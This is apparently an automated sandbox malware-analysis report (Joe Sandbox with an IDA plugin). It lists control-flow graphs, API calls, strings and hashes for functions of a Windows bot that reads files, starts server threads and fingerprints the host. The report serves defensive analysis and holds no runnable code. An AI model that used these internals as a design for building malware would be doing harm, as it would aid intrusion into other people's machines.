                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                                                                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                                                                  • API String ID: 2897271634-4120527733
                                                                                                                  • Opcode ID: 06552b6d665657d530df30bd6e78b206d8aa5c71a17eae6289350a2be74dd1e0
                                                                                                                  • Instruction ID: 3a33c9ba258e322e01cfab41a9cf3708d20a058addb9a5af73449511881f699f
                                                                                                                  • Opcode Fuzzy Hash: 06552b6d665657d530df30bd6e78b206d8aa5c71a17eae6289350a2be74dd1e0
                                                                                                                  • Instruction Fuzzy Hash: 76D15671A09A82C1EB10FF55E850BBCA661AF557A5FC44133D90E473A1EEBDE586C320

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 85 7ffe126e3aa7-7ffe126e3aca InitializeCriticalSectionAndSpinCount 86 7ffe126e3c52-7ffe126e3c73 GetLastError call 7ffe126e2072 85->86 87 7ffe126e3ad0-7ffe126e3af7 InitializeCriticalSectionAndSpinCount 85->87 98 7ffe126e3c8d-7ffe126e3c93 86->98 99 7ffe126e3c75 86->99 88 7ffe126e3afd-7ffe126e3b0d 87->88 89 7ffe126e3d6e-7ffe126e3d8f GetLastError call 7ffe126e2072 87->89 91 7ffe126e3b13-7ffe126e3b4b CreateThread 88->91 92 7ffe126e4140-7ffe126e4158 call 7ffe126e2072 88->92 104 7ffe126e3da9-7ffe126e3daf 89->104 105 7ffe126e3d91 89->105 96 7ffe126e3e46-7ffe126e3e67 GetLastError call 7ffe126e2072 91->96 97 7ffe126e3b51-7ffe126e3b6d call 7ffe126e2072 91->97 103 7ffe126e415d-7ffe126e4164 92->103 121 7ffe126e3e7d-7ffe126e3e83 96->121 122 7ffe126e3e69 96->122 97->92 127 7ffe126e3b73-7ffe126e3bab CreateThread 97->127 101 7ffe126e3c99-7ffe126e3c9f 98->101 102 7ffe126e3d32 98->102 108 7ffe126e3c7b-7ffe126e3c88 99->108 109 7ffe126e3d1e 99->109 110 7ffe126e3ccb-7ffe126e3cce 101->110 111 7ffe126e3ca1-7ffe126e3ca7 101->111 120 7ffe126e3d3c 102->120 115 7ffe126e4165-7ffe126e416a 104->115 116 7ffe126e3db5-7ffe126e3dbb 104->116 112 7ffe126e413b 105->112 113 7ffe126e3d97-7ffe126e3da4 105->113 108->98 109->102 125 7ffe126e3ce4-7ffe126e3cea 110->125 126 7ffe126e3cd0-7ffe126e3cd3 110->126 118 7ffe126e3d5a 111->118 119 7ffe126e3cad-7ffe126e3cb3 111->119 112->92 113->104 115->92 123 7ffe126e3dbd-7ffe126e3dc3 116->123 124 7ffe126e3de7-7ffe126e3dea 116->124 129 7ffe126e3d64 118->129 128 7ffe126e3cb9-7ffe126e3cbf 119->128 119->129 149 7ffe126e3d46 120->149 134 7ffe126e3e85 121->134 135 7ffe126e3ee0-7ffe126e3ef0 121->135 130 7ffe126e3e6b-7ffe126e3e78 122->130 131 7ffe126e3e9f-7ffe126e3eaf 122->131 132 7ffe126e3dc9-7ffe126e3dcf 123->132 133 7ffe126e4181-7ffe126e4186 123->133 137 7ffe126e3dec-7ffe126e3def 124->137 138 7ffe126e3e08-7ffe126e3e0e 124->138 139 7ffe126e3cec 125->139 140 7ffe126e3d50 125->140 126->120 136 7ffe126e3cd5-7ffe126e3cd8 126->136 141 7ffe126e3f4e-7ffe126e3f6f GetLastError call 7ffe126e2072 127->141 142 7ffe126e3bb1-7ffe126e3bcd call 7ffe126e2072 127->142 143 7ffe126e3cf6 128->143 144 7ffe126e3cc1 128->144 129->89 130->121 131->92 146 7ffe126e4188-7ffe126e418d 132->146 147 7ffe126e3dd5-7ffe126e3ddb 132->147 133->92 155 7ffe126e3e87-7ffe126e3e8d 134->155 156 7ffe126e3eb4-7ffe126e3eb7 134->156 135->92 148 7ffe126e3cda 136->148 136->149 150 7ffe126e416c-7ffe126e4171 137->150 151 7ffe126e3df5-7ffe126e3df8 137->151 152 7ffe126e417a-7ffe126e417f 138->152 153 7ffe126e3e14-7ffe126e3e19 138->153 139->143 140->118 167 7ffe126e3f85-7ffe126e3f8b 141->167 168 7ffe126e3f71 141->168 142->92 169 7ffe126e3bd3-7ffe126e3c0b CreateThread 142->169 143->109 144->110 146->92 158 7ffe126e3ddd-7ffe126e3de2 147->158 159 7ffe126e3e1e-7ffe126e3e23 147->159 148->125 149->140 150->92 160 7ffe126e4173-7ffe126e4178 151->160 161 7ffe126e3dfe-7ffe126e3e03 151->161 152->92 153->92 163 7ffe126e3ec3-7ffe126e3ed3 155->163 164 7ffe126e3e8f-7ffe126e3e95 155->164 165 7ffe126e3eb9-7ffe126e3ebc 156->165 166 7ffe126e3ed8-7ffe126e3ede 156->166 158->92 159->92 160->92 161->92 163->92 170 7ffe126e3e97-7ffe126e3e9d 164->170 171 7ffe126e3ef5-7ffe126e3f05 164->171 172 7ffe126e3f0a-7ffe126e3f1a 165->172 173 7ffe126e3ebe-7ffe126e3ec1 165->173 166->131 166->135 176 7ffe126e3f8d 167->176 177 7ffe126e3fe8-7ffe126e3ff8 167->177 174 7ffe126e3fa7-7ffe126e3fb7 168->174 175 7ffe126e3f73-7ffe126e3f80 168->175 178 7ffe126e404c-7ffe126e406d GetLastError call 7ffe126e2072 169->178 179 7ffe126e3c11-7ffe126e3c2d call 7ffe126e2072 169->179 170->131 170->135 171->92 172->92 173->131 173->163 174->92 175->167 180 7ffe126e3fbc-7ffe126e3fbf 176->180 181 7ffe126e3f8f-7ffe126e3f95 176->181 177->92 195 7ffe126e4083-7ffe126e4089 178->195 196 7ffe126e406f 178->196 179->92 194 7ffe126e3c33-7ffe126e3c48 call 7ffe126e2072 179->194 186 7ffe126e3fc1-7ffe126e3fc4 180->186 187 7ffe126e3fe0-7ffe126e3fe6 180->187 184 7ffe126e3fcb-7ffe126e3fdb 181->184 185 7ffe126e3f97-7ffe126e3f9d 181->185 184->92 190 7ffe126e3ffd-7ffe126e400d 185->190 191 7ffe126e3f9f-7ffe126e3fa5 185->191 192 7ffe126e3fc6-7ffe126e3fc9 186->192 193 7ffe126e4012-7ffe126e4022 186->193 187->174 187->177 190->92 191->174 191->177 192->174 192->184 193->92 204 7ffe126e3c4d 194->204 197 7ffe126e408b 195->197 198 7ffe126e40b9-7ffe126e40c9 195->198 200 7ffe126e40e3-7ffe126e40f3 196->200 201 7ffe126e4071-7ffe126e407e 196->201 202 7ffe126e40cb-7ffe126e40d1 197->202 203 7ffe126e408d-7ffe126e4090 197->203 198->92 200->92 201->195 207 7ffe126e409c-7ffe126e40ac 202->207 208 7ffe126e40d3-7ffe126e40d9 202->208 205 7ffe126e4092-7ffe126e4095 203->205 206 7ffe126e40b1-7ffe126e40b7 203->206 204->103 209 7ffe126e4107-7ffe126e4117 205->209 210 7ffe126e4097-7ffe126e409a 205->210 206->198 206->200 207->92 211 7ffe126e40db-7ffe126e40e1 208->211 212 7ffe126e40f5-7ffe126e4105 208->212 209->92 210->200 210->207 211->198 211->200 212->92
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                                                                                                  • API String ID: 3214881788-719614687
                                                                                                                  • Opcode ID: f7911d3e117f0e2a4205b477b6c60c068354a7cbdf9ae8e7f48fa1ee92ee012b
                                                                                                                  • Instruction ID: 233f696a64fb2a3834489794e0f31107f95b9ec79340b12305491919c1454780
                                                                                                                  • Opcode Fuzzy Hash: f7911d3e117f0e2a4205b477b6c60c068354a7cbdf9ae8e7f48fa1ee92ee012b
                                                                                                                  • Instruction Fuzzy Hash: 43F1DA20E0CF4382FF60D717AC943B92291AF25379F2403B6C56E462F5DEEEA9958345

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 213 7ffe126e482c-7ffe126e4846 call 7ffe126e5154 216 7ffe126e484c-7ffe126e4861 call 7ffe126e50d3 213->216 217 7ffe126e4d68 213->217 222 7ffe126e48b7 216->222 223 7ffe126e4863-7ffe126e4891 216->223 219 7ffe126e4d7c-7ffe126e4d81 217->219 221 7ffe126e48c9-7ffe126e48e0 call 7ffe126e2072 219->221 227 7ffe126e48e5-7ffe126e48f2 221->227 224 7ffe126e48bc-7ffe126e48c7 FreeLibrary 222->224 231 7ffe126e489a-7ffe126e48b5 call 7ffe126e2072 223->231 232 7ffe126e4893-7ffe126e4898 223->232 224->221 226 7ffe126e48f3-7ffe126e492c GetNativeSystemInfo GetWindowsDirectoryA 224->226 229 7ffe126e4932-7ffe126e4953 GetLastError call 7ffe126e2072 226->229 230 7ffe126e4a10-7ffe126e4a33 call 7ffe126e2072 226->230 240 7ffe126e4973-7ffe126e4979 229->240 241 7ffe126e4955 229->241 230->221 239 7ffe126e4a39-7ffe126e4a6f call 7ffe126e9ad2 230->239 231->224 232->224 249 7ffe126e4a75-7ffe126e4a77 239->249 250 7ffe126e4b20-7ffe126e4b3c call 7ffe126e2072 239->250 240->219 243 7ffe126e497f-7ffe126e4985 240->243 244 7ffe126e4957-7ffe126e4964 241->244 245 7ffe126e4969-7ffe126e496e 241->245 247 7ffe126e4987-7ffe126e498a 243->247 248 7ffe126e49be-7ffe126e49c4 243->248 244->245 245->221 251 7ffe126e498c-7ffe126e498f 247->251 252 7ffe126e49a8-7ffe126e49ae 247->252 253 7ffe126e49ca-7ffe126e49d0 248->253 254 7ffe126e4da4-7ffe126e4da9 248->254 249->221 255 7ffe126e4a7d-7ffe126e4ada GetVolumeInformationA 249->255 269 7ffe126e4b41 250->269 256 7ffe126e4d86-7ffe126e4d8b 251->256 257 7ffe126e4995-7ffe126e4998 251->257 258 7ffe126e4d9a-7ffe126e4d9f 252->258 259 7ffe126e49b4-7ffe126e49b9 252->259 260 7ffe126e49d6-7ffe126e49dc 253->260 261 7ffe126e4dae-7ffe126e4db3 253->261 254->221 263 7ffe126e4bd7-7ffe126e4c09 call 7ffe126e2072 255->263 264 7ffe126e4ae0-7ffe126e4b06 GetLastError call 7ffe126e2072 255->264 256->221 265 7ffe126e499e-7ffe126e49a3 257->265 266 7ffe126e4d90-7ffe126e4d95 257->266 258->221 259->221 267 7ffe126e49e8-7ffe126e49ed 260->267 268 7ffe126e49de-7ffe126e49e3 260->268 261->221 276 7ffe126e4c0b-7ffe126e4c17 strlen 263->276 277 7ffe126e4c1d-7ffe126e4c24 263->277 274 7ffe126e4b46-7ffe126e4b4c 264->274 275 7ffe126e4b08 264->275 265->221 266->221 267->221 268->221 269->249 281 7ffe126e4ca3-7ffe126e4ca8 274->281 282 7ffe126e4b52 274->282 278 7ffe126e4c8f-7ffe126e4c94 275->278 279 7ffe126e4b0e-7ffe126e4b1b 275->279 276->277 280 7ffe126e4ce9-7ffe126e4ced 276->280 283 7ffe126e4c28-7ffe126e4c85 call 7ffe126e2072 277->283 278->221 279->250 280->277 287 7ffe126e4cf3-7ffe126e4cf7 280->287 281->221 284 7ffe126e4b8b-7ffe126e4b91 282->284 285 7ffe126e4b54-7ffe126e4b57 282->285 290 7ffe126e4c8a 283->290 291 7ffe126e4ccb-7ffe126e4cd0 284->291 292 7ffe126e4b97-7ffe126e4b9d 284->292 288 7ffe126e4b59-7ffe126e4b5c 285->288 289 7ffe126e4b75-7ffe126e4b7b 285->289 287->277 293 7ffe126e4cfd-7ffe126e4d30 _errno strtol _errno 287->293 294 7ffe126e4cad-7ffe126e4cb2 288->294 295 7ffe126e4b62-7ffe126e4b65 288->295 296 7ffe126e4cc1-7ffe126e4cc6 289->296 297 7ffe126e4b81-7ffe126e4b86 289->297 290->227 291->221 298 7ffe126e4ba3-7ffe126e4ba9 292->298 299 7ffe126e4cd5-7ffe126e4cda 292->299 300 7ffe126e4d32-7ffe126e4d35 293->300 301 7ffe126e4d40-7ffe126e4d63 _errno call 7ffe126e2072 293->301 294->221 303 7ffe126e4b6b-7ffe126e4b70 295->303 304 7ffe126e4cb7-7ffe126e4cbc 295->304 296->221 297->221 305 7ffe126e4cdf-7ffe126e4ce4 298->305 306 7ffe126e4baf-7ffe126e4bb4 298->306 299->221 300->283 307 7ffe126e4d3b 300->307 301->277 303->221 304->221 305->221 306->221 307->277
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                  • Opcode ID: 37bdd8bba23396995cb43fde43ceaba587d72f5a41f2d6fa8fc17c29e9146edb
                                                                                                                  • Instruction ID: 44f6f32b967d26fcfc42b914b526bc0de99fcc6800708287b936cd84f1398a58
                                                                                                                  • Opcode Fuzzy Hash: 37bdd8bba23396995cb43fde43ceaba587d72f5a41f2d6fa8fc17c29e9146edb
                                                                                                                  • Instruction Fuzzy Hash: C4D11B21E0CE9285FB20DB67ACA03B92250EB55BB4F1502F2C95D176F4DEADE844C785

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 407 7ffe11bdc25c-7ffe11bdc276 call 7ffe11bdbc64 410 7ffe11bdc27c-7ffe11bdc291 call 7ffe11bdbbe3 407->410 411 7ffe11bdc798 407->411 416 7ffe11bdc2e7 410->416 417 7ffe11bdc293-7ffe11bdc2c1 410->417 413 7ffe11bdc7ac-7ffe11bdc7b1 411->413 415 7ffe11bdc2f9-7ffe11bdc310 call 7ffe11bdc852 413->415 421 7ffe11bdc315-7ffe11bdc322 415->421 418 7ffe11bdc2ec-7ffe11bdc2f7 FreeLibrary 416->418 425 7ffe11bdc2ca-7ffe11bdc2e5 call 7ffe11bdc852 417->425 426 7ffe11bdc2c3-7ffe11bdc2c8 417->426 418->415 420 7ffe11bdc323-7ffe11bdc35c GetNativeSystemInfo GetWindowsDirectoryA 418->420 423 7ffe11bdc362-7ffe11bdc383 GetLastError call 7ffe11bdc852 420->423 424 7ffe11bdc440-7ffe11bdc463 call 7ffe11bdc852 420->424 434 7ffe11bdc3a3-7ffe11bdc3a9 423->434 435 7ffe11bdc385 423->435 424->415 433 7ffe11bdc469-7ffe11bdc49f call 7ffe11bd5192 424->433 425->418 426->418 443 7ffe11bdc4a5-7ffe11bdc4a7 433->443 444 7ffe11bdc550-7ffe11bdc56c call 7ffe11bdc852 433->444 434->413 437 7ffe11bdc3af-7ffe11bdc3b5 434->437 438 7ffe11bdc387-7ffe11bdc394 435->438 439 7ffe11bdc399-7ffe11bdc39e 435->439 441 7ffe11bdc3b7-7ffe11bdc3ba 437->441 442 7ffe11bdc3ee-7ffe11bdc3f4 437->442 438->439 439->415 445 7ffe11bdc3bc-7ffe11bdc3bf 441->445 446 7ffe11bdc3d8-7ffe11bdc3de 441->446 447 7ffe11bdc3fa-7ffe11bdc400 442->447 448 7ffe11bdc7d4-7ffe11bdc7d9 442->448 443->415 449 7ffe11bdc4ad-7ffe11bdc50a GetVolumeInformationA 443->449 463 7ffe11bdc571 444->463 450 7ffe11bdc7b6-7ffe11bdc7bb 445->450 451 7ffe11bdc3c5-7ffe11bdc3c8 445->451 452 7ffe11bdc7ca-7ffe11bdc7cf 446->452 453 7ffe11bdc3e4-7ffe11bdc3e9 446->453 454 7ffe11bdc406-7ffe11bdc40c 447->454 455 7ffe11bdc7de-7ffe11bdc7e3 447->455 448->415 457 7ffe11bdc607-7ffe11bdc639 call 7ffe11bdc852 449->457 458 7ffe11bdc510-7ffe11bdc536 GetLastError call 7ffe11bdc852 449->458 450->415 459 7ffe11bdc3ce-7ffe11bdc3d3 451->459 460 7ffe11bdc7c0-7ffe11bdc7c5 451->460 452->415 453->415 461 7ffe11bdc418-7ffe11bdc41d 454->461 462 7ffe11bdc40e-7ffe11bdc413 454->462 455->415 470 7ffe11bdc63b-7ffe11bdc647 strlen 457->470 471 7ffe11bdc64d-7ffe11bdc654 457->471 468 7ffe11bdc576-7ffe11bdc57c 458->468 469 7ffe11bdc538 458->469 459->415 460->415 461->415 462->415 463->443 475 7ffe11bdc6d3-7ffe11bdc6d8 468->475 476 7ffe11bdc582 468->476 472 7ffe11bdc6bf-7ffe11bdc6c4 469->472 473 7ffe11bdc53e-7ffe11bdc54b 469->473 470->471 474 7ffe11bdc719-7ffe11bdc71d 470->474 477 7ffe11bdc658-7ffe11bdc6b5 call 7ffe11bdc852 471->477 472->415 473->444 474->471 481 7ffe11bdc723-7ffe11bdc727 474->481 475->415 478 7ffe11bdc5bb-7ffe11bdc5c1 476->478 479 7ffe11bdc584-7ffe11bdc587 476->479 484 7ffe11bdc6ba 477->484 485 7ffe11bdc6fb-7ffe11bdc700 478->485 486 7ffe11bdc5c7-7ffe11bdc5cd 478->486 482 7ffe11bdc589-7ffe11bdc58c 479->482 483 7ffe11bdc5a5-7ffe11bdc5ab 479->483 481->471 487 7ffe11bdc72d-7ffe11bdc760 _errno call 7ffe11be4610 _errno 481->487 488 7ffe11bdc6dd-7ffe11bdc6e2 482->488 489 7ffe11bdc592-7ffe11bdc595 482->489 490 7ffe11bdc6f1-7ffe11bdc6f6 483->490 491 7ffe11bdc5b1-7ffe11bdc5b6 483->491 484->421 485->415 492 7ffe11bdc5d3-7ffe11bdc5d9 486->492 493 7ffe11bdc705-7ffe11bdc70a 486->493 500 7ffe11bdc762-7ffe11bdc765 487->500 501 7ffe11bdc770-7ffe11bdc793 _errno call 7ffe11bdc852 487->501 488->415 495 7ffe11bdc59b-7ffe11bdc5a0 489->495 496 7ffe11bdc6e7-7ffe11bdc6ec 489->496 490->415 491->415 497 7ffe11bdc70f-7ffe11bdc714 492->497 498 7ffe11bdc5df-7ffe11bdc5e4 492->498 493->415 495->415 496->415 497->415 498->415 500->477 502 7ffe11bdc76b 500->502 501->471 502->471
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                  • Opcode ID: 8bef46f6451bce531e2b0b4ae084a213c315c766dd6f265defd2aab1fb297d2e
                                                                                                                  • Instruction ID: 7cec1e2f2a6b03fc55f9671f3564de1bcb4ebb3e9292efb69413b505227be689
                                                                                                                  • Opcode Fuzzy Hash: 8bef46f6451bce531e2b0b4ae084a213c315c766dd6f265defd2aab1fb297d2e
                                                                                                                  • Instruction Fuzzy Hash: 69D18C61E0DE87C1FF389F57E840BF96698AF04778F1560BAD94E132B0DE2DA9448781

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 603 7ffe1a4f348c-7ffe1a4f34a6 call 7ffe1a4f3db4 606 7ffe1a4f34ac-7ffe1a4f34c1 call 7ffe1a4f3d33 603->606 607 7ffe1a4f39c8 603->607 612 7ffe1a4f3517 606->612 613 7ffe1a4f34c3-7ffe1a4f34f1 606->613 609 7ffe1a4f39dc-7ffe1a4f39e1 607->609 611 7ffe1a4f3529-7ffe1a4f3540 call 7ffe1a4f1352 609->611 618 7ffe1a4f3545-7ffe1a4f3552 611->618 614 7ffe1a4f351c-7ffe1a4f3527 FreeLibrary 612->614 619 7ffe1a4f34fa-7ffe1a4f3515 call 7ffe1a4f1352 613->619 620 7ffe1a4f34f3-7ffe1a4f34f8 613->620 614->611 617 7ffe1a4f3553-7ffe1a4f358c GetNativeSystemInfo GetWindowsDirectoryA 614->617 621 7ffe1a4f3592-7ffe1a4f35b3 GetLastError call 7ffe1a4f1352 617->621 622 7ffe1a4f3670-7ffe1a4f3693 call 7ffe1a4f1352 617->622 619->614 620->614 630 7ffe1a4f35b5 621->630 631 7ffe1a4f35d3-7ffe1a4f35d9 621->631 622->611 629 7ffe1a4f3699-7ffe1a4f36cf call 7ffe1a4fba62 622->629 639 7ffe1a4f36d5-7ffe1a4f36d7 629->639 640 7ffe1a4f3780-7ffe1a4f379c call 7ffe1a4f1352 629->640 632 7ffe1a4f35c9-7ffe1a4f35ce 630->632 633 7ffe1a4f35b7-7ffe1a4f35c4 630->633 631->609 635 7ffe1a4f35df-7ffe1a4f35e5 631->635 632->611 633->632 637 7ffe1a4f35e7-7ffe1a4f35ea 635->637 638 7ffe1a4f361e-7ffe1a4f3624 635->638 641 7ffe1a4f35ec-7ffe1a4f35ef 637->641 642 7ffe1a4f3608-7ffe1a4f360e 637->642 643 7ffe1a4f362a-7ffe1a4f3630 638->643 644 7ffe1a4f3a04-7ffe1a4f3a09 638->644 639->611 645 7ffe1a4f36dd-7ffe1a4f373a GetVolumeInformationA 639->645 653 7ffe1a4f37a1 640->653 646 7ffe1a4f39e6-7ffe1a4f39eb 641->646 647 7ffe1a4f35f5-7ffe1a4f35f8 641->647 648 7ffe1a4f39fa-7ffe1a4f39ff 642->648 649 7ffe1a4f3614-7ffe1a4f3619 642->649 650 7ffe1a4f3636-7ffe1a4f363c 643->650 651 7ffe1a4f3a0e-7ffe1a4f3a13 643->651 644->611 654 7ffe1a4f3837-7ffe1a4f3869 call 7ffe1a4f1352 645->654 655 7ffe1a4f3740-7ffe1a4f3766 GetLastError call 7ffe1a4f1352 645->655 646->611 656 7ffe1a4f39f0-7ffe1a4f39f5 647->656 657 7ffe1a4f35fe-7ffe1a4f3603 647->657 648->611 649->611 658 7ffe1a4f3648-7ffe1a4f364d 650->658 659 7ffe1a4f363e-7ffe1a4f3643 650->659 651->611 653->639 664 7ffe1a4f387d-7ffe1a4f3884 654->664 665 7ffe1a4f386b-7ffe1a4f3877 strlen 654->665 666 7ffe1a4f3768 655->666 667 7ffe1a4f37a6-7ffe1a4f37ac 655->667 656->611 657->611 658->611 659->611 669 7ffe1a4f3888-7ffe1a4f38e5 call 7ffe1a4f1352 664->669 665->664 668 7ffe1a4f3949-7ffe1a4f394d 665->668 672 7ffe1a4f376e-7ffe1a4f377b 666->672 673 7ffe1a4f38ef-7ffe1a4f38f4 666->673 670 7ffe1a4f37b2 667->670 671 7ffe1a4f3903-7ffe1a4f3908 667->671 668->664 677 7ffe1a4f3953-7ffe1a4f3957 668->677 678 7ffe1a4f38ea 669->678 675 7ffe1a4f37eb-7ffe1a4f37f1 670->675 676 7ffe1a4f37b4-7ffe1a4f37b7 670->676 671->611 672->640 673->611 681 7ffe1a4f392b-7ffe1a4f3930 675->681 682 7ffe1a4f37f7-7ffe1a4f37fd 675->682 679 7ffe1a4f37b9-7ffe1a4f37bc 676->679 680 7ffe1a4f37d5-7ffe1a4f37db 676->680 677->664 683 7ffe1a4f395d-7ffe1a4f3990 _errno call 7ffe1a500bd8 _errno 677->683 678->618 685 7ffe1a4f390d-7ffe1a4f3912 679->685 686 7ffe1a4f37c2-7ffe1a4f37c5 679->686 687 7ffe1a4f3921-7ffe1a4f3926 680->687 688 7ffe1a4f37e1-7ffe1a4f37e6 680->688 681->611 689 7ffe1a4f3935-7ffe1a4f393a 682->689 690 7ffe1a4f3803-7ffe1a4f3809 682->690 696 7ffe1a4f3992-7ffe1a4f3995 683->696 697 7ffe1a4f39a0-7ffe1a4f39c3 _errno call 7ffe1a4f1352 683->697 685->611 692 7ffe1a4f37cb-7ffe1a4f37d0 686->692 693 7ffe1a4f3917-7ffe1a4f391c 686->693 687->611 688->611 689->611 694 7ffe1a4f393f-7ffe1a4f3944 690->694 695 7ffe1a4f380f-7ffe1a4f3814 690->695 692->611 693->611 694->611 695->611 696->669 698 7ffe1a4f399b 696->698 697->664 698->664
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
